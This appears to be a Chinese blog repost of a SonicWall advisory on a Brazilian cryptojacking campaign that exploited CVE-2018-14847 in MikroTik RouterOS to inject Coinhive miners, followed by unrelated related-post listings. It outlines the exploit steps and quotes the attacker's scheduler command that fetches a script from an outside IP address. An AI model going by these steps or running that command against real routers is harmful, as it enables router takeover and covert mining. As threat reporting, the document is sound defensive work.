原文:

https://securitynews.sonicwall.com/xmlpost/massive-cryptojacking-campaign/

SonicWall is observing a massive Cryptojacking malware that is spreading aggressively throughout Brazil. The Malware attempts to exploit the vulnerability CVE-2018-14847 by targeting the unpatched versions of MikroTik RouterOS. Compromised MikroTik routers have been made to inject Coinhive miner script into the web pages it host & also pages from web proxy.  As MikroTik routers are mainly used by Internet Service Providers (ISP), the impact is huge & widespread.

Fig:1 Monero mining through compromised MikroTik RouterOS

CVE-2018-14847:

Winbox, a utility tool for administration of MikroTik RouterOS, allows remote attackers to bypass authentication and to read arbitrary files. Winbox accepts socket connection through port 8291, and in case of error, it sends out “Bad Session id” response. Along with this response one byte from the Session ID is also sent. Attackers could exploit this exposure of session ID to craft a request to get into the system. MikroTik RouterOS versions from 6.29 through 6.42 are vulnerable to this attack.

STEPS TO EXPLOIT THIS VULNERABILITY:

1. Scan for MikroTik devices by sending UDP broadcast message to port 5678 and figure out mac address from the socket connection message.

Note: UDP port 5678 is used for MikroTik Neighbor Discovery Protocol (MNDP).

Fig: 2 Discovering MikroTik devices from POC

2. Attempt to connect to MicroTik device with its mac. Capture the Session ID leaked by the “Bad session id response”. Resend the packet by  altering just one byte of session id to bypass authentication allowing access to files

Fig 3 : Exploit code from POC

3. Extract the data files & user credential to get admin privilege over MikroTik

4. Make the below changes to the MikroTik Routers, leaving the device more vulnerable than before.

  • Disable Drop rules for Firewall
  • Enable port 4145 for ip socks
  • System scheduler to run a script named script3_ every 30s to fetch the updated mikrotik.php
    • fetch a\ddress=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http”

We too observed unusual port activity for the destination port 4145. The below spike in the port scan aligns with the time period of this attack. But the IP address that tapped is not same as 95.154.216.*

Fig: 4 NetworkScan monitor report from netlab 360

INJECT COINHIVE MINER SCRIPT:

MikroTik can be used as web server hosting web pages & as proxy server proxying HTTP requests, caching the response to use later and also provides custom error pages. It is found that attackers have used all three venues to wide spread the injection of coinhive miner. Users connected to MikroTik RouterOS can have the script injected into their responses & as well the users visiting the pages hosted by MiktoTik (shown in Fig 1) . It spreads quickly up to ~200,000 web hosts having the Coinhive miner script linked with a single Coinhive ‘SiteKey’ that belongs to the attacker

Fig: 5 Coinhive miner script injected into a website

Fig: 6 Volume of web hosts impacted with this

CONINHIVE:

Cryptojacking is same as cryptocurrency but secret use of your computing device to mine cryptocurrency. In-browser cryptojacking secretly use the computing device of the site visitor to mine bits of cryptocurrencies.  Coinhive is a cryptocurrency mining service that offers Javascript miner API for the Monero Blockchain. It can be embedded in any website. But website owners abuse this service by not asking for users permission to run the miner. Also attackers abuse this by embedding coinhive API with his sitekey on the hacked websites. Users visiting those sites run miner on their browsers draining their CPU power as long as the browser is open. Unlike Bitcoin, Monero is untraceable and there is no way to track Monero transactions. This makes Monero an ideal candidate for hackers and Coinhive the most prevalent malware to mine cryptocurrency. With Cryptojacking, all the infected machines will work to mine cryptocurrency, more profitable than Ransomware.

Sonicwall Threat Research Lab provides protection against Coinhive miner with the following signatures:

  • GAV Coinhive.JS_2
  • GAV CoinHive.JS
  • SPY CoinHive WebAssembly Binary 1
  • IPS Coinhive Monero Miner Secure Web Traffic 1
  • IPS Coinhive Monero Miner Secure Web Traffic 2
  • IPS Coinhive Monero Miner Web Traffic 1

Trend Graph & Geostatistics :

Find below the hits that SonicWall observed in the recent past

This can be avoided by updating to the latest version of MikroTik RouterOS & securing the Router with strong authentication & firewall rules to block unauthorized access.

ROS routeros mikrotik路由器CVE-2018-14847漏洞的更多相关文章

  1. CVE补丁安全漏洞【学习笔记】

    更新安卓系统的CVE补丁网站:https://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/version ...

  2. ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

    路由器的WPS功能 很多路由器都有WPS功能, 这边的WPS不是office工具软件, 而是路由器的一个功能: 路由器中WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定(Wi-Fi Prot ...

  3. ddns+ros(routeros)+centos7.6+nginx+php+dnspod

    参考文章: http://www.myxzy.com/post-464.html https://www.cnblogs.com/crazytata/p/9686490.html php的源码下载: ...

  4. MikroTik RouterOS网址资源收集

    routeros|mikrotik|ros|软路由论坛|中国路由网|软件路由|软件路由器|routeros技术论坛|路由论坛 - Powered by Discuz!   Mikrotik RB450 ...

  5. 【转帖】2018年Windows漏洞年度盘点

    2018年Windows漏洞年度盘点丨老漏洞经久不衰,新0day层出不穷 腾讯电脑管家2019-02-12共17875人围观 ,发现 1 个不明物体网络安全资讯 https://www.freebuf ...

  6. 漏洞都是怎么编号的CVE/CAN/BUGTRAQ/CNCVE/CNVD/CNNVD

    在一些文章和报道中常常提到安全漏洞CVE-1999-1046这样的CVE开头的漏洞编号,这篇文章将常见的漏洞ID的表示方法做下介绍: 1.以CVE开头,如CVE-1999-1046这样的 CVE 的英 ...

  7. NETGEAR 系列路由器命令执行漏洞简析

    NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和 ...

  8. 深入剖析最新IE0day漏洞

    在2018年4月下旬,我们使用沙箱发现了IE0day漏洞;自从在野外发现上一个样本(CVE-2016-0189)已经有两年多了.从许多方面来看,这个特别的漏洞及其后续的开发比较有趣.下一篇文章将分析最 ...

  9. java中xxe漏洞修复方法

    java中禁止外部实体引用的设置方法不止一种,这样就导致有些开发者修复的时候采用的错误的方法 之所以写这篇文章是有原因的!最早是有朋友在群里发了如下一个pdf, 而当时已经是2019年1月末了,应该不 ...

随机推荐

  1. Stm32L0串口中断接收使用

    最新在做LoRa的项目,使用的是STM32L072和SX1276,需要做一个串口透传模块,刚开始做demo的时候不考虑功耗,所以串口发送和接收直接使用下列函数执行: HAL_UART_Transmit ...

  2. Python知识点整理,基础2 - 列表操作

  3. Vue.js系列之项目搭建

    项目搭建具体步骤如下: 1.安装node (中)https://nodejs.org/zh-cn/ (英)https://nodejs.org/en/ 2.安装cnpm镜像 (node自带安装了npm ...

  4. 【java编程】加密算法-对称加密及AES加密算法

    转载:https://www.jianshu.com/p/3840b344b27c?utm_campaign=maleskine&utm_content=note&utm_medium ...

  5. architecture and business process modelling

    bpmn 架构相关的文章: 转自:https://www.heflo.com/definitions/architecture-business-process-modeling/ BPMN Mode ...

  6. nginx ssi + ngx_pagespeed 实现micro frontends 开发

    nginx 的ssi 功能让我们可以将不同的拼接起来,ngx_pagespeed 是pagespeed 的nginx 模块,可以帮助 我们解决前端的一些性能优化的问题,通过简单的配置就可以搞定 一张参 ...

  7. lua-resty-shell 多任务执行

    已经写过一个openresty 使用lua-resty-shell 执行shell 脚本的demo,但是实际上我们可能是多节点运行, 同时需要负载均衡的机制. lua-resty-shell 支持un ...

  8. 数学沉思录:古今数学思想的发展与演变 (Mario Livio 著)

    第1章 神秘的数学 (已看) 发现还是发明 第2章 神秘学:命理学家和哲学家 (已看) 毕达哥拉斯 进入柏拉图的洞穴 第3章 魔法师:大师和异端 (已看) 给我一个支点:我将撬起地球 阿基米德重写稿 ...

  9. Python高阶函数_map/reduce/filter函数

    本篇将开始介绍python高阶函数map/reduce/filter的用法,更多内容请参考:Python学习指南 map/reduce Python内建了map()和reduce()函数. 如果你读过 ...

  10. MySQL 5.7新特性之在线收缩undo表空间

    1. MySQL 5.5时代的undo log 在MySQL5.5以及之前,大家会发现随着数据库上线时间越来越长,ibdata1文件(即InnoDB的共享表空间,或者系统表空间)会越来越大,这会造成2 ...